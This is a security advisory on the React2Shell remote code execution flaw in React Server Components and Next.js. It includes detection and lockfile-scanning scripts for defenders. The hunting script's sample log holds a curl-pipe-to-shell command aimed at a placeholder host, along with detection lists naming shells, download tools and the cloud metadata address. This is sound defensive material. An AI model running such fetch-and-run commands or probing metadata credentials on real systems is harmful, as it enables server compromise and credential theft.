React2Shell: Critical 10.0 CVSS RCE Hits React & Next.js, Actively Exploited!

Critical 'React2Shell' RCE (CVE-2025-55182) in React Server Components Under Active Exploitation

CRITICAL
December 3, 2025
Vulnerability, Cyberattack, Cloud Security

Related Entities

Threat Actors: Earth Lamia, Jackpot Panda

Products & Tech: React, Next.js, Node.js

CVE Identifiers:
  • CVE-2025-55182 (CRITICAL, CVSS 10.0)
  • CVE-2025-66478 (CRITICAL, CVSS 10.0)

Full Report

Executive Summary

A critical, unauthenticated remote code execution (RCE) vulnerability, CVE-2025-55182, has been disclosed in React Server Components (RSC) and therefore affects the frameworks built on it, most notably Next.js. Nicknamed 'React2Shell,' the flaw carries a CVSS 10.0 'Critical' rating and lets an attacker execute arbitrary code on the server without any authentication. It is being actively exploited in the wild, with observed post-exploitation activity including cloud credential theft and cryptomining. Given the widespread use of these frameworks and the ease of exploitation, every organization running affected versions of React or Next.js must upgrade to patched versions immediately. Web Application Firewall (WAF) rules offer temporary protection but are not a substitute for patching.


Vulnerability Details

CVE-2025-55182 is an unsafe deserialization vulnerability in the way React Server Components decode incoming RSC payloads, the wire format also known as the "Flight" protocol. An unauthenticated attacker sends a specially crafted HTTP POST request to any Server Function endpoint of a vulnerable application. The server-side React library deserializes the malicious payload without adequate validation, and the attacker-controlled input ends up executing as JavaScript in the Node.js process that hosts the application. No session, token or credential is required, so any internet-facing deployment of an affected version is in scope.

Crucially, applications are vulnerable even if they do not explicitly define any Server Function endpoints, as the underlying RSC mechanism is still present and exploitable in affected versions. This significantly widens the attack surface.

Affected Systems

The vulnerability impacts a range of popular web development tools and frameworks. Key affected products include:

  • React Server Components, i.e. the react-server-dom-parcel, react-server-dom-turbopack and react-server-dom-webpack packages: versions 19.0.0, 19.1.0, 19.1.1 and 19.2.0
  • Next.js: 15.x and 16.x applications that use the App Router

According to Wiz, an estimated 39% of cloud environments contain vulnerable instances of these frameworks, highlighting the massive potential impact.

Exploitation Status

Active, in-the-wild exploitation of CVE-2025-55182 was observed by multiple security firms, including Amazon and Wiz, within hours of its public disclosure on December 3, 2025. Attackers, including groups identified as Earth Lamia and Jackpot Panda, are scanning for and exploiting vulnerable servers. Observed post-exploitation activities include:

  • Probing for cloud environment metadata services to steal credentials.
  • Deploying cryptocurrency mining malware.

Impact Assessment

Successful exploitation of 'React2Shell' grants an attacker full control over the web server. The business impact is severe and can include:

  • Complete System Compromise: Attackers can read, modify, or delete any data on the server, install backdoors, and maintain persistence.
  • Cloud Account Takeover: If the server is hosted in a cloud environment (e.g., AWS, GCP, Azure), attackers can steal instance metadata credentials, potentially gaining access to the entire cloud account and its associated resources.
  • Data Breach: Sensitive application data, user information, and intellectual property can be exfiltrated.
  • Financial Loss: Attackers can deploy resource-intensive malware like cryptominers, leading to significant increases in cloud computing bills.

Cyber Observables for Detection

Security teams should hunt for exploitation attempts by monitoring web server, process and network telemetry for the following observables.

  • url_pattern: any Server Function endpoint. Monitor HTTP POST requests to any route that handles React Server Components. In Next.js App Router deployments, Server Action invocations are POST requests that carry a Next-Action request header, so logging that header at the reverse proxy gives a direct filter.
  • network_traffic_pattern: outbound connections from the Node.js process to the cloud metadata service. A node process connecting to 169.254.169.254 is a strong indicator of compromise on hosts where the application does not itself fetch instance credentials; baseline that first, because cloud SDKs running under node use the metadata service legitimately.
  • process_name: node spawning unexpected child processes. Look for the Node.js process spawning shells (/bin/sh, cmd.exe) or launching download tools such as curl and wget.

Detection & Response

  • WAF Deployment: Immediately enable WAF rules provided by cloud vendors like Cloudflare, AWS, Akamai, and Google Cloud. These rules are designed to block known exploit patterns for CVE-2025-55182. This is a form of D3-ITF: Inbound Traffic Filtering.
  • Log Analysis: Proactively hunt through web server and WAF logs for HTTP POST requests containing unusual or obfuscated payloads directed at RSC endpoints. Correlate these with any anomalous outbound network connections from your web servers.
  • Endpoint Monitoring: Use EDR or similar tools on servers to detect if the node process spawns suspicious child processes or makes connections to unexpected external IP addresses or internal metadata services.
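The observables above and the log-analysis and endpoint-monitoring steps can be combined into one hunting script. The following is an added example written for this article, not code from the article's author, the React project or any vendor. It runs over three constructed JSON-lines samples (a reverse-proxy access log that records the Next-Action header, EDR-style process creation events and connection events); the field names are an assumption of the example, not any product's schema.

```python
"""Hunt for React2Shell (CVE-2025-55182) indicators across web, process and
network telemetry, then correlate host-side hits with the RSC POSTs that
preceded them.

Added example, not code from the article or the React/Next.js projects. The
three inputs are constructed JSON-lines samples; their field names (ts, src,
method, next_action, parent_comm, comm, dst_ip, ...) are assumptions of this
example rather than a real product's schema.
"""
import json
import os
from datetime import datetime, timedelta

METADATA_IP = "169.254.169.254"          # IMDS on AWS, Azure and GCP
SHELLS = {"sh", "bash", "dash", "zsh", "cmd.exe", "powershell.exe"}
DOWNLOADERS = {"curl", "wget"}
CORRELATION_WINDOW = timedelta(minutes=5)

# Constructed sample: reverse-proxy access log that records the Next-Action
# request header. Next.js App Router sends Server Action invocations as POST
# requests carrying that header, so these are the RSC entry points to watch.
ACCESS_LOG = """\
{"ts":"2025-12-03T10:00:05Z","src":"198.51.100.7","method":"GET","path":"/pricing","status":200,"next_action":""}
{"ts":"2025-12-03T10:01:40Z","src":"203.0.113.5","method":"POST","path":"/","status":500,"next_action":"a1b2c3"}
{"ts":"2025-12-03T10:01:41Z","src":"203.0.113.5","method":"POST","path":"/","status":200,"next_action":"a1b2c3"}
{"ts":"2025-12-03T10:30:00Z","src":"198.51.100.7","method":"POST","path":"/","status":200,"next_action":"d4e5f6"}
"""

# Constructed sample: EDR-style process creation events from the web server.
PROCESS_EVENTS = """\
{"ts":"2025-12-03T10:01:42Z","host":"web-1","pid":4242,"ppid":1337,"parent_comm":"node","comm":"sh","cmdline":"sh -c curl -s http://203.0.113.5/x.sh|sh"}
{"ts":"2025-12-03T10:01:43Z","host":"web-1","pid":4243,"ppid":4242,"parent_comm":"sh","comm":"curl","cmdline":"curl -s http://203.0.113.5/x.sh"}
{"ts":"2025-12-03T10:05:00Z","host":"web-1","pid":4300,"ppid":1,"parent_comm":"systemd","comm":"cron","cmdline":"/usr/sbin/cron -f"}
"""

# Constructed sample: connection events (flow logs or EDR network telemetry).
NETWORK_EVENTS = """\
{"ts":"2025-12-03T10:01:45Z","host":"web-1","pid":1337,"comm":"node","dst_ip":"169.254.169.254","dst_port":80}
{"ts":"2025-12-03T10:02:00Z","host":"web-1","pid":1337,"comm":"node","dst_ip":"10.0.2.15","dst_port":5432}
{"ts":"2025-12-03T10:02:10Z","host":"web-1","pid":4243,"comm":"curl","dst_ip":"203.0.113.5","dst_port":80}
"""


def parse_jsonl(text):
    records = []
    for line in text.splitlines():
        if line.strip():
            rec = json.loads(line)
            rec["ts"] = datetime.fromisoformat(rec["ts"].replace("Z", "+00:00"))
            records.append(rec)
    return records


def rsc_posts(access_records):
    """Requests that reach RSC Server Function handling: POST with Next-Action."""
    return [r for r in access_records if r["method"] == "POST" and r.get("next_action")]


def process_indicators(proc_records):
    """node spawning a shell or a downloader: the process_name observable."""
    hits = []
    for r in proc_records:
        child = os.path.basename(r["comm"])
        if r["parent_comm"] == "node" and child in SHELLS | DOWNLOADERS:
            hits.append({"kind": "node_spawned_" + child, "ts": r["ts"],
                         "host": r["host"], "detail": r["cmdline"]})
    return hits


def network_indicators(net_records, imds_expected_hosts=frozenset()):
    """node reaching the metadata service. Caveat: cloud SDKs fetch instance
    credentials from IMDS legitimately, so baseline first and list the hosts
    where that is expected in imds_expected_hosts to suppress them."""
    hits = []
    for r in net_records:
        if (r["comm"] == "node" and r["dst_ip"] == METADATA_IP
                and r["host"] not in imds_expected_hosts):
            hits.append({"kind": "node_to_imds", "ts": r["ts"], "host": r["host"],
                         "detail": f"{r['dst_ip']}:{r['dst_port']}"})
    return hits


def correlate(indicators, posts, window=CORRELATION_WINDOW):
    """Attach the RSC POSTs seen shortly before each host-side indicator."""
    findings = []
    for ind in indicators:
        prior = [p for p in posts if ind["ts"] - window <= p["ts"] <= ind["ts"]]
        findings.append(dict(ind, suspect_sources=sorted({p["src"] for p in prior})))
    return findings


def hunt(access_log=ACCESS_LOG, proc_log=PROCESS_EVENTS, net_log=NETWORK_EVENTS,
         imds_expected_hosts=frozenset()):
    posts = rsc_posts(parse_jsonl(access_log))
    indicators = (process_indicators(parse_jsonl(proc_log))
                  + network_indicators(parse_jsonl(net_log), imds_expected_hosts))
    return correlate(indicators, posts)


if __name__ == "__main__":
    for f in hunt():
        print(f["ts"].isoformat(), f["host"], f["kind"], f["detail"],
              "after RSC POSTs from", f["suspect_sources"])
```

On the sample data the script reports two findings on web-1 (node spawning sh, and node contacting the metadata service), both correlated to the POSTs from 203.0.113.5 in the preceding five minutes; passing imds_expected_hosts={"web-1"} suppresses the metadata hit for a host whose application legitimately uses IMDS. The curl launched by the child shell is only a grandchild of node, so a production version should walk process ancestry rather than checking the immediate parent alone.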

Remediation Steps

WAF rules are a temporary stopgap, not a permanent solution. Patching is the only definitive remediation.

  1. Upgrade Immediately: Developers must upgrade all affected applications to a patched version of the relevant library (e.g., Next.js, React). Refer to the official security advisories from React and Vercel for specific patched versions. This aligns with MITRE Mitigation M1051 - Update Software.
  2. Vulnerability Scanning: Run software composition analysis (SCA) or vulnerability scanners to identify all instances of vulnerable libraries across your environment, including in development and testing pipelines.
  3. Network Segmentation: As a compensating control, restrict outbound network access from web servers to only essential services. Block access to cloud metadata endpoints (169.254.169.254) if the application does not explicitly require them. Where the application does need instance credentials, require the token-based metadata API (IMDSv2 on AWS) rather than leaving the unauthenticated v1 endpoint open, and scope the instance role to the minimum the application needs so that stolen credentials have limited reach. This is an application of M1030 - Network Segmentation.
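Step 2 can be run against the lockfile itself rather than waiting on a third-party scanner. The script below is an added example, not the article's or the React project's tooling: it takes the affected package names and versions from this article's Affected Systems list, reads a constructed package-lock.json sample embedded inline, and flags both top-level and nested (transitively installed) copies. Fixed versions are deliberately not hard-coded, because the article defers to the React and Vercel advisories for them.

```python
"""Scan an npm lockfile for React Server Components packages at the versions
the article lists as affected by CVE-2025-55182 (React2Shell).

Added example, not the article's or the React project's tooling. The
affected names and versions come from the article's Affected Systems list;
fixed versions are not hard-coded because the article defers to the React
and Vercel advisories for those. SAMPLE_LOCKFILE is a constructed example in
the lockfile v3 layout that npm 7+ writes.
"""
import json
import re
import sys

# Packages and versions the article lists as affected.
RSC_PACKAGES = {"react-server-dom-webpack", "react-server-dom-turbopack",
                "react-server-dom-parcel"}
AFFECTED_RSC_VERSIONS = {"19.0.0", "19.1.0", "19.1.1", "19.2.0"}
# Next.js 15.x and 16.x App Router apps are affected; the fixed release on each
# line comes from the Vercel advisory, so these are flagged for review.
NEXT_AFFECTED_MAJORS = {15, 16}

# Constructed sample lockfile: one top-level RSC package and a second copy
# nested under another dependency, which a grep of package.json would miss.
SAMPLE_LOCKFILE = json.dumps({
    "name": "shop-frontend",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "shop-frontend",
             "dependencies": {"next": "15.1.0", "react": "19.1.1"}},
        "node_modules/next": {"version": "15.1.0"},
        "node_modules/react": {"version": "19.1.1"},
        "node_modules/react-dom": {"version": "19.1.1"},
        "node_modules/react-server-dom-webpack": {"version": "19.1.1"},
        "node_modules/some-tool": {"version": "2.0.0"},
        "node_modules/some-tool/node_modules/react-server-dom-webpack":
            {"version": "19.0.0"},
        "node_modules/express": {"version": "4.21.0"},
    },
})


def package_name(path):
    """'node_modules/a/node_modules/@s/b' -> '@s/b' (last node_modules segment)."""
    return path.rsplit("node_modules/", 1)[-1]


def _walk_v1(deps, prefix=""):
    """Lockfile v1 nests dependencies as a tree; flatten it to (path, meta)."""
    for name, meta in deps.items():
        path = f"{prefix}node_modules/{name}"
        yield path, meta
        yield from _walk_v1(meta.get("dependencies", {}), path + "/")


def lock_entries(lock):
    if "packages" in lock:  # lockfile v2/v3: flat map keyed by install path
        return [(p, m) for p, m in lock["packages"].items() if p]  # skip root ""
    return list(_walk_v1(lock.get("dependencies", {})))  # lockfile v1


def scan_lockfile(text):
    """Return one finding per affected install, top-level or nested."""
    findings = []
    for path, meta in lock_entries(json.loads(text)):
        name, version = package_name(path), meta.get("version", "")
        if name in RSC_PACKAGES and version in AFFECTED_RSC_VERSIONS:
            findings.append({"package": name, "version": version, "path": path,
                             "severity": "vulnerable",
                             "reason": "RSC version listed as affected by CVE-2025-55182"})
        elif name == "next":
            major = re.match(r"(\d+)\.", version)
            if major and int(major.group(1)) in NEXT_AFFECTED_MAJORS:
                findings.append({"package": name, "version": version, "path": path,
                                 "severity": "review",
                                 "reason": "Next.js 15.x/16.x line; confirm against the Vercel advisory"})
    return findings


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LOCKFILE
    findings = scan_lockfile(text)
    for f in findings:
        print(f"{f['severity']:<10} {f['path']} {f['version']}: {f['reason']}")
    sys.exit(1 if any(f["severity"] == "vulnerable" for f in findings) else 0)
```

Run it as `python scan_lock.py path/to/package-lock.json` in CI; it exits non-zero when an affected RSC version is installed anywhere in the tree. The nested copy under some-tool is the case to watch for: updating the top-level react-server-dom-webpack alone leaves it in place, so after patching confirm with `npm ls react-server-dom-webpack react-server-dom-turbopack react-server-dom-parcel` that every resolved copy is on a fixed version.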

Timeline of Events

  1. December 3, 2025: The 'React2Shell' vulnerability (CVE-2025-55182) is publicly disclosed.
  2. December 3, 2025: This article was published.
  3. December 3, 2025: Security researchers report observing active in-the-wild exploitation attempts.

MITRE ATT&CK Mitigations

  • Upgrading to a patched version of React and Next.js is the only definitive way to remediate the vulnerability (M1051 - Update Software).
  • Deploying updated WAF rules from cloud providers can block known exploitation patterns as a temporary mitigation (D3FEND D3-ITF: Inbound Traffic Filtering).
  • Running the application in a container with minimal privileges and strict network egress rules can limit the impact of a successful compromise (M1030 - Network Segmentation).

D3FEND Defensive Countermeasures

The highest priority action is to immediately update all applications using React Server Components or Next.js to the latest patched versions. This is not just a recommendation; it is a critical requirement given the 10.0 CVSS score and active exploitation. Use a Software Composition Analysis (SCA) tool to scan your entire codebase, including all dependencies, to identify every instance of the vulnerable libraries. Update the pinned versions in package.json, regenerate the lockfile (package-lock.json or yarn.lock) with npm install or yarn install so the fixed versions are recorded, and rebuild from a clean node_modules. Then confirm the result with npm ls react-server-dom-webpack react-server-dom-turbopack react-server-dom-parcel next (or the yarn equivalent), because a nested copy pulled in transitively by another dependency is not fixed by bumping the top-level version. Deploy the patched application to all environments, from development to production, as quickly as possible. This is the only way to fully close the CVE-2025-55182 attack vector.

As an immediate, temporary mitigation while patching is underway, deploy and enable the specific WAF rules released by your cloud or security provider (AWS, Cloudflare, Akamai, etc.) designed to detect and block 'React2Shell' exploits. These rules inspect incoming HTTP POST requests for the malicious deserialization patterns associated with CVE-2025-55182. It is crucial to set these rules to 'Block' mode, not just 'Alert'. While effective against known public exploits, sophisticated attackers may find ways to bypass these signatures. Therefore, WAF rules should be seen as a critical but temporary shield, not a permanent solution. The focus must remain on applying the software patches.

To limit the impact of a potential compromise, enforce strict egress filtering on the security groups or firewalls protecting your Next.js and React servers. Since a primary post-exploitation goal is stealing cloud credentials, explicitly deny all outbound traffic from the server to the cloud metadata IP address (169.254.169.254) unless the application has a legitimate and documented need for it. Furthermore, adopt a default-deny posture for all outbound traffic, only allowing connections to known, required endpoints (e.g., specific database servers, external APIs). This can prevent a compromised server from establishing a C2 connection or exfiltrating data, effectively containing the breach.

Sources & References

NVD - CVE-2025-55182
NIST NVD (nvd.nist.gov) December 3, 2025

Article Author

Jason Gomes

  • Cybersecurity Practitioner

Cybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.

Threat Intelligence & Analysis, Security Orchestration (SOAR/XSOAR), Incident Response & Digital Forensics, Security Operations Center (SOC), SIEM & Security Analytics, Cyber Fusion & Threat Sharing, Security Automation & Integration, Managed Detection & Response (MDR)

Tags

React, Next.js, RCE, Vulnerability, CVSS 10, Zero-Day, Deserialization, WAF
